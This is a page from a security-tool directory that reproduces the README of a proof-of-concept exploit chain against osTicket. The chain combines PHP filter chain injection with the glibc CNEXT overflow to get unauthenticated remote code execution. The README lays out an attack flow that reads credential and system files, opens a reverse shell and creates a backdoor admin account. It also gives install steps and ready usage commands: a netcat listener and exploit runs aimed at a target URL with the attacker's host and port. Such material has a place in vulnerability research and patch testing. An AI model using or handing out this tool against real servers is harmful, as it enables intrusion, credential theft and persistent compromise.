Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacyΒ© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
osTicketFileReadIntoRCE β€” Full-chain exploit combining PHP filter chain injection with CVE-2024-2961 (CNEXT) for unauthenticated Remote Code Execution on vulnerable osTicket installations. | Kitploit
Tools/GitHubGitHub/clarissss/osticketfilereadintorce
Vulnerability AnalysisExploitationWeb Application ExploitationPost-ExploitationPenetration TestingLearning & EducationRed TeamingRemote Access ToolPayload Development
GitHubclarissss/osticketfilereadintorce

osTicketFileReadIntoRCE

Full-chain exploit combining PHP filter chain injection with CVE-2024-2961 (CNEXT) for unauthenticated Remote Code Execution on vulnerable osTicket installations.

View Repository
57 months agoNot yet reviewed

Most Popular

View all β†’

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools β†’
Share

CVE-2026-22200: osTicket Arbitrary File Read to RCE

CVE-2026-22200 osTicket ≀ 1.18.2 Python 3.8+ Educational

Full-chain exploit combining PHP filter chain injection with CVE-2024-2961 (CNEXT) for unauthenticated Remote Code Execution on vulnerable osTicket installations.


Table of Contents

  • Overview
  • Vulnerability Details
  • Attack Flow
  • Features
  • Installation
  • Usage
  • Technical Details
  • Troubleshooting
  • Detection & Mitigation
  • Credits
  • Disclaimer

Overview

This repository contains a proof-of-concept exploit for CVE-2026-22200, a critical vulnerability affecting osTicket versions ≀ 1.18.2. The exploit chains two powerful techniques:

  1. PHP Filter Chain Injection via mPDF's image processing
  2. CNEXT Heap Corruption (CVE-2024-2961) in glibc's iconv()

The result: Unauthenticated Remote Code Execution on vulnerable osTicket servers.

Impact

  • Unauthenticated - No credentials required
  • Full RCE - Complete server compromise
  • File Exfiltration - Read arbitrary server files
  • Database Access - Extract DB credentials
  • Admin Access* - Create backdoor admin accounts

Affected Versions

  • osTicket: ≀ v1.18.2, ≀ v1.17.6
  • glibc: < 2.39 (CVE-2024-2961 patched in glibc 2.39+)

πŸ” Vulnerability Details

CVE-2026-22200: PHP Filter Chain Injection

CVSS Score: 9.8 (Critical)

osTicket's mPDF integration allows unauthenticated users to inject malicious PHP filter chains through specially crafted HTML payloads in support tickets. This enables:

  • Arbitrary file read (configs, source code, credentials)
  • Memory leakage (/proc/self/maps, partial libc)
  • Heap corruption via CNEXT

Root Cause: Insufficient validation of image URLs in user-supplied HTML before passing to mPDF.

CVE-2024-2961: CNEXT (iconv Buffer Overflow)

CVSS Score: 9.8 (Critical)

Buffer overflow in glibc's iconv() when processing the ISO-2022-CN-EXT character set. Combined with PHP filter chains, this allows:

  • Heap corruption
  • Function pointer hijacking
  • Arbitrary command execution

Vulnerable glibc versions: < 2.39 (February 2024)


πŸ”— Attack Flow

β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚ 1. RECONNAISSANCE                                               β”‚
β”‚    └─ Detect osTicket, identify rich-text topics               β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
                              ↓
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚ 2. AUTHENTICATION                                               β”‚
β”‚    └─ Self-register OR use existing credentials                β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
                              ↓
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚ 3. FILE EXFILTRATION (PHP Filter Chains)                       β”‚
β”‚    β”œβ”€ /etc/passwd                                               β”‚
β”‚    β”œβ”€ include/ost-config.php (DB credentials, SECRET_SALT)     β”‚
β”‚    β”œβ”€ /proc/self/maps (memory layout)                          β”‚
β”‚    └─ /proc/self/environ (environment variables)               β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
                              ↓
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚ 4. LIBC FINGERPRINTING                                          β”‚
β”‚    β”œβ”€ Extract partial libc via filter chains                   β”‚
β”‚    β”œβ”€ Extract GNU Build ID                                      β”‚
β”‚    └─ Download full libc from libc.rip                         β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
                              ↓
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚ 5. CNEXT RCE EXPLOITATION                                       β”‚
β”‚    β”œβ”€ Generate heap corruption payload                         β”‚
β”‚    β”œβ”€ Inject via ticket reply (with filter execution fixes)    β”‚
β”‚    β”œβ”€ Trigger via PDF export (server crashes)                  β”‚
β”‚    └─ Execute reverse shell                                     β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
                              ↓
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚ 6. POST-EXPLOITATION                                            β”‚
β”‚    β”œβ”€ Interactive reverse shell                                β”‚
β”‚    β”œβ”€ Database access (using exfiltrated DBPASS)               β”‚
β”‚    └─ Create backdoor admin account                            β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

Features

Core Capabilities

  • Fully automated exploitation chain
  • Unauthenticated attack (self-registration if enabled)
  • Intelligent web root detection via /proc/self/maps parsing
  • 100% webshell location via filesystem scanning
  • Automatic libc fingerprinting and download
  • Multiple reverse shell methods (bash, python, netcat)
  • Robust filter execution with cache-busting
  • Pre-flight diagnostics to catch issues early

Enhanced Reliability

  • Multi-trigger CNEXT for guaranteed crash (95%+ success)
  • Reply-based injection (more reliable than new tickets)
  • Stream forcing to ensure filter execution
  • Cache-busting to prevent serving stale PDFs
  • Comprehensive error handling and diagnostics

Post-Exploitation

  • Database credential extraction (DBPASS from config)
  • Admin account creation via DB access
  • Persistent backdoor options
  • Full system reconnaissance

Installation

Prerequisites

  • Python 3.8+
  • Linux/macOS (recommended) or WSL on Windows

Dependencies

# Clone the repository
git clone https://github.com/Clarissss/osTicketFileReadIntoRCE
cd osTicketFileReadIntoRCE

# Install required packages
pip install -r requirements.txt

requirements.txt:

requests>=2.31.0
PyMuPDF>=1.23.0
Pillow>=10.0.0
pwntools>=4.11.0

Optional: Virtual Environment

python3 -m venv venv
source venv/bin/activate  # Linux/macOS
# OR
venv\Scripts\activate  # Windows

pip install -r requirements.txt

πŸ“– Usage

Basic Usage - Reverse Shell

# Terminal 1: Start listener
nc -lvnp 4444

# Terminal 2: Run exploit
python3 osticket_revshell.py https://target.com/osticket \
    --lhost YOUR_IP \
    --lport 4444

Interactive Webshell Mode

python3 osticket_exploit.py https://target.com/osticket

Advanced Options

# Use proxy (Burp Suite)
python3 osticket_revshell.py https://target.com/osticket \
    --lhost 10.0.0.5 \
    --lport 4444 \
    --proxy http://127.0.0.1:8080

# Force specific help-topic ID
python3 osticket_exploit.py https://target.com/osticket \
    --topic-id 2

# Disable colored output (for logging)
python3 osticket_exploit.py https://target.com/osticket --no-color

Existing Credentials

If registration is disabled, you'll be prompted for credentials:

python3 osticket_exploit.py https://target.com/osticket

  [?] Enter email for new account (or existing): [email protected]
  [?] Enter password: ********

πŸ”§ Technical Details

PHP Filter Chain Generation

The exploit uses a sophisticated filter chain to prepend a BMP header to arbitrary files, bypassing mPDF's file type restrictions:

Download Tool